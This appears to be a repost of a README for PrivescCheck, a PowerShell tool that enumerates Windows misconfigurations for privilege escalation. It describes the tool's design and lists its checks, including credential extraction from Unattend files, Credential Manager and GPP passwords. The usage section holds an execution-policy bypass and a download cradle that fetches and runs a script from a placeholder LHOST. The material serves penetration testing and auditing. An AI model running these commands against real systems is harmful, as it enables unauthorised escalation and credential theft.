PrivescCheck script aims to enumerate common Windows security misconfigurations which can be leveraged for privilege escalation and gather various information which might be useful for exploitation and/or post-exploitation.
I built on the amazing work done by @harmj0y and @mattifestation in PowerUp. I added more checks and also tried to reduce the amount of false positives.
It’s still a Work-in-Progress because there are a few more checks I want to implement but it’s already quite complete. If you have any suggestion (improvements, features), feel free to contact me on Twitter @itm4n.
Usage
PS C:\Temp\> Set-ExecutionPolicy Bypass -Scope Process -Force
PS C:\Temp\> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck
PS C:\Temp\> . .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck | Tee-Object “C:\Temp\result.txt”
C:\Temp\>powershell -ep bypass -c “. .\Invoke-PrivescCheck.ps1; Invoke-PrivescCheck”
C:\Temp\>powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://LHOST:LPORT/Invoke-PrivescCheck.ps1’); Invoke-PrivescCheck”
I really like PowerUp because it can enumerate common vulnerabilities very quickly and without using any third-party tools. The problem is that it hasn’t been updated for several years now. The other issue I spotted quite a few times over the years is that it sometimes returns false positives which are quite confusing.
Other tools exist on GitHub but they are not as complete or they have too many dependencies. For example, they rely on WMI calls or other command outputs.
Therefore, I decided to make my own script with the following constraints in mind:
accesschk.exe
from SysInternals. whoami.exe
or netstat.exe
. The reason for this is that I want my script to be able to run in environments where AppLocker (or any other Application Whitelisting solution) is enforced. sc.exe
or tasklist.exe
because you’ll often get an Access denied error if you try to use them on Windows Server 2016/2019 for instance. Also Read – XCTR Hacking Tools 2020
Addressing all the constraints…
I have no merit, I reused some of the code made by @harmj0y and @mattifestation. Indeed, PowerUp has a very powerfull function called Get-ModifiablePath
which checks the ACL of a given file path to see if the current user
has write permissions on the file or folder. I modified this function a
bit to avoid some false positives though. Before that a service command
line argument such as /svc
could be identified as a vulnerable path because it was interpreted as C:\svc
. My other contribution is that I made a registry-compatible version of this function (Get-ModifiableRegistryPath
).
When possible, I naturally replaced them with built-in PowerShell commands such as Get-Process
. In other cases, such as netstat.exe
,
you won’t get as much information as you would with basic PowerShell
commands. For example, with PowerShell, TCP/UDP listeners can easily be
listed but there is no easy way to get the associated Process ID. In
this case, I had to invoke Windows API functions.
You can get a looooot of information through WMI, that’s great! But,
if you face a properly hardened machine, the access to this interface
will be restricted. So, I had to find workarounds. And here comes the Registry!
Common checks are based on some registry keys but it has a lot more to
offer. The best example is services. You can get all the information you
need about every single service (except their current state obviously)
simply by browsing the registry. This is a huge advantage compared to sc.exe
or Get-Service
which depend on the access to the Service Control Manager.
This wasn’t that easy because newer version of PowerShell have very convenient functions or options. For example, the Get-LocalGroup
function doesn’t exist and Get-ChildItem
doesn’t have the -Depth
option in PowerShellv2. So, you have to work your way around each one of these small but time-consuming issues.
Features
Invoke-UserCheck – Gets the usernane and SID of the current user
Invoke-UserGroupsCheck – Enumerates groups the current user belongs to except default and low-privileged ones
Invoke-UserPrivilegesCheck – Enumerates the high potential privileges of the current user’s token
-Invoke-InstalledServicesCheck – Enumerates non-default services
-Invoke-ServicesPermissionsCheck – Enumerates the services the current user can modify through the service control manager
-Invoke-ServicesPermissionsRegistryCheck – Enumerates services that can be modified by the current user in the registry
-Invoke-ServicesImagePermissionsCheck – Enumerates all the services that have a modifiable binary (or argument)
-Invoke-ServicesUnquotedPathCheck – Enumerates services with an unquoted path that can be exploited
Invoke-DllHijackingCheck – Checks whether any of the system path folders is modifiable
-Invoke-InstalledProgramsCheck – Enumerates the applications that are not installed by default
-Invoke-ModifiableProgramsCheck – Enumerates applications which have a modifiable EXE of DLL file
-Invoke-RunningProcessCheck – Enumerates the running processes
-Invoke-SamBackupFilesCheck – Checks common locations for the SAM/SYSTEM backup files
-Invoke-UnattendFilesCheck – Enumerates Unattend files and extracts credentials
-Invoke-WinlogonCheck – Checks credentials stored in the Winlogon registry key
-Invoke-CredentialFilesCheck – Lists the Credential files that are stored in the current user AppData folders
-Invoke-VaultCredCheck – Enumerates credentials saved in the Credential Manager
-Invoke-VaultListCheck – Enumerates web credentials saved in the Credential Manager
-Invoke-GPPPasswordCheck – Lists Group Policy Preferences (GPP) containing a non-empty “cpassword” field
-Invoke-UacCheck – Checks whether UAC (User Access Control) is enabled -Invoke-LapsCheck – Checks whether LAPS (Local Admin Password Solution) is enabled
-Invoke-PowershellTranscriptionCheck – Checks whether PowerShell Transcription is configured/enabled
-Invoke-RegistryAlwaysInstallElevatedCheck – Checks whether the AlwaysInstallElevated key is set in the registry
-Invoke-LsaProtectionsCheck – Checks whether LSASS is running as a Protected Process (+ additional checks)
-Invoke-TcpEndpointsCheck – Enumerates unusual TCP endpoints on the local machine (IPv4 and IPv6)
-Invoke-UdpEndpointsCheck – Enumerates unusual UDP endpoints on the local machine (IPv4 and IPv6)
-Invoke-WindowsUpdateCheck – Checks the last update time of the machine -Invoke-SystemInfoCheck – Gets the name of the operating system and the full version string
-Invoke-LocalAdminGroupCheck – Enumerates the members of the default local admin group
-Invoke-MachineRoleCheck – Gets the role of the machine (workstation, server, domain controller)
-Invoke-SystemStartupHistoryCheck – Gets a list of system startup events -Invoke-SystemStartupCheck – Gets the last system startup time
-Invoke-SystemDrivesCheck – Gets a list of local drives and network shares that are currently mapped
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…